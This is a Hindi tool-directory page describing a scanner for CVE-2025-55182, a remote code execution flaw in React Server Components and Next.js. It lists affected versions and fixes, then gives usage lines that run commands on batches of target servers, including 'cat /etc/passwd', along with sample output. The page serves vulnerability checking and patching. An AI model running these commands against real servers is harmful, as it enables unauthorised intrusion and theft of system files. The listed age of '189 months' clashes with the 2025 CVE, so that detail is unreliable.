Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-Scanner — स्वचालित स्कैनर CVE-2025-55182 के लिए: React Server Components और Next.js में एक गंभीर RCE भेद्यता। | Kitploit
उपकरण/GitHubGitHub/qixinlee/cve-2025-55182-scanner
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubqixinlee/cve-2025-55182-scanner

CVE-2025-55182-Scanner

स्वचालित स्कैनर CVE-2025-55182 के लिए: React Server Components और Next.js में एक गंभीर RCE भेद्यता।

रिपॉजिटरी देखें
189 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 RCE Scanner

CVE-2025-55182 (React2Shell) दूरस्थ कोड निष्पादन भेद्यता के लिए बैच डिटेक्शन और सत्यापन उपकरण।

⚠️ CVSS 10.0 गंभीर भेद्यता | React Server Components और Next.js 15.x/16.x संस्करणों को प्रभावित करता है | केवल अधिकृत सुरक्षा परीक्षण के लिए

भेद्यता परिचय

CVE-2025-55182 (उर्फ "React2Shell") एक CVSS 10.0 पूर्ण अंक गंभीरता वाली अप्रमाणित दूरस्थ कोड निष्पादन (RCE) भेद्यता है।

यह भेद्यता React Server Components (RSC) के react-server पैकेज में RSC "Flight" प्रोटोकॉल को संसाधित करते समय असुरक्षित डिसेरियलाइज़ेशन समस्या के कारण उत्पन्न होती है। हमलावर विशेष रूप से तैयार HTTP अनुरोध भेजकर भेद्यता वाले सर्वर पर मनमाना कोड निष्पादित कर सकते हैं।

चूंकि Next.js RSC "Flight" प्रोटोकॉल का उपयोग करता है, इसलिए create-next-app के साथ बनाए गए डिफ़ॉल्ट कॉन्फ़िगरेशन एप्लिकेशन भी डेवलपर द्वारा कोई अतिरिक्त कोड लिखे बिना शोषित किए जा सकते हैं। 5 दिसंबर 2025 से इस भेद्यता का सक्रिय रूप से शोषण होने का पता चला है।

प्रभावित संस्करण

React Server Components प्रभावित संस्करण:

पैकेज नामप्रभावित संस्करण
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js प्रभावित संस्करण (App Router का उपयोग करते हुए):

मुख्य संस्करणप्रभावित संस्करण सीमाफिक्स संस्करण
16.0.x≤ 16.0.616.0.7
15.5.x≤ 15.5.615.5.7
15.4.x≤ 15.4.715.4.8
15.3.x≤ 15.3.515.3.6
15.2.x≤ 15.2.5-
15.1.x≤ 15.1.8-
15.0.x≤ 15.0.4-
14.x Canary≥ 14.3.0-canary.77-

अन्य संभावित रूप से प्रभावित RSC फ्रेमवर्क/उपकरण:

  • react-router
  • waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk
  • RedwoodJS (RSC मोड)

अस्थायी शमन उपाय

⚠️ महत्वपूर्ण नोट: इस भेद्यता का कोई ज्ञात अस्थायी शमन उपाय नहीं है, सुरक्षित संस्करण में अपग्रेड करना ही एकमात्र फिक्स है।

अनुशंसित अपग्रेड संस्करण:

  • React: 19.0.1, 19.1.2 या 19.2.1 में अपग्रेड करें
  • Next.js: 16.0.7, 15.5.7, 15.4.8 या 15.3.6 में अपग्रेड करें

आधिकारिक रूप से प्रदान किए गए fix-react2shell-next npm पैकेज का उपयोग प्रभावित Next.js एप्लिकेशन को अपडेट करने में सहायता के लिए किया जा सकता है।

निर्भरताएँ स्थापित करें

pip install requests

उपयोग विधि

मूल उपयोग

# बैच स्कैन (urls.txt से लक्ष्य पढ़ें)
python CVE-2025-55182.py -f urls.txt

# एकल लक्ष्य परीक्षण
python CVE-2025-55182.py -u http://192.168.1.100:3000

कस्टम कमांड

# whoami कमांड निष्पादित करें
python CVE-2025-55182.py -f urls.txt -c "whoami"

# hostname कमांड निष्पादित करें
python CVE-2025-55182.py -u http://target.com -c "hostname"

# फ़ाइल पढ़ें
python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"

उन्नत विकल्प

# थ्रेड्स और टाइमआउट निर्दिष्ट करें
python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15

# कस्टम आउटपुट फ़ाइल
python CVE-2025-55182.py -f urls.txt -o scan_results.csv

# साइलेंट मोड (केवल भेद्यता URL आउटपुट करें)
python CVE-2025-55182.py -f urls.txt -q

पैरामीटर स्पष्टीकरण

पैरामीटरस्पष्टीकरणडिफ़ॉल्ट मान
-f, --fileURL सूची फ़ाइलurls.txt
-u, --urlएकल लक्ष्य URL-
-t, --threadsसमवर्ती थ्रेड्स की संख्या20
--timeoutअनुरोध टाइमआउट (सेकंड)10
-o, --outputआउटपुट CSV फ़ाइलresults.csv
-c, --commandनिष्पादित किया जाने वाला कमांडid
-q, --quietसाइलेंट मोडfalse

URL फ़ाइल प्रारूप

प्रति पंक्ति एक URL, उदाहरण:

http://192.168.1.10:3000
http://192.168.1.11:3000

आउटपुट उदाहरण

    +---------------------------------------------------------------+
    |   ###   ## #######  ##  ## ########       ## #######          |
    |   ####  ## ##       ## ##     ##          ## ##               |
    |   ## ## ## #####     ###      ##          ## #######          |
    |   ##  #### ##       ## ##     ##      ##  ##       ##         |
    |   ##   ### ####### ##   ##    ##       ####  #######          |
    |                                                               |
    |   CVE-2025-55182 RCE Scanner                                  |
    +---------------------------------------------------------------+

============================================================
  [ CONFIGURATION ]
============================================================
  > Targets: 10
  > Threads: 20
  > Command: id

============================================================
  [ SCANNING ]
============================================================
  [14:30:25] [VULN] http://192.168.1.10:3000
             '--> uid=1000(www-data)
  [14:30:26] [SAFE] http://192.168.1.11:3000

+==========================================================+
|                     SCAN COMPLETE                        |
+==========================================================+
|  Total Targets :    10                                   |
|  Vulnerable    :     1                                   |
|  Safe          :     9                                   |
|  Errors        :     0                                   |
+==========================================================+

आउटपुट फ़ाइल

स्कैन परिणाम CSV प्रारूप में सहेजे जाते हैं, जिनमें निम्नलिखित फ़ील्ड होते हैं:

  • url - लक्ष्य URL
  • status - HTTP स्थिति कोड
  • vulnerable - क्या भेद्यता मौजूद है
  • output - कमांड निष्पादन आउटपुट
  • error - त्रुटि संदेश

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है, कृपया इसका उपयोग अवैध उद्देश्यों के लिए न करें। उपयोगकर्ता को संबंधित जिम्मेदारी स्वयं वहन करनी होगी।

टूल डाउनलोड करें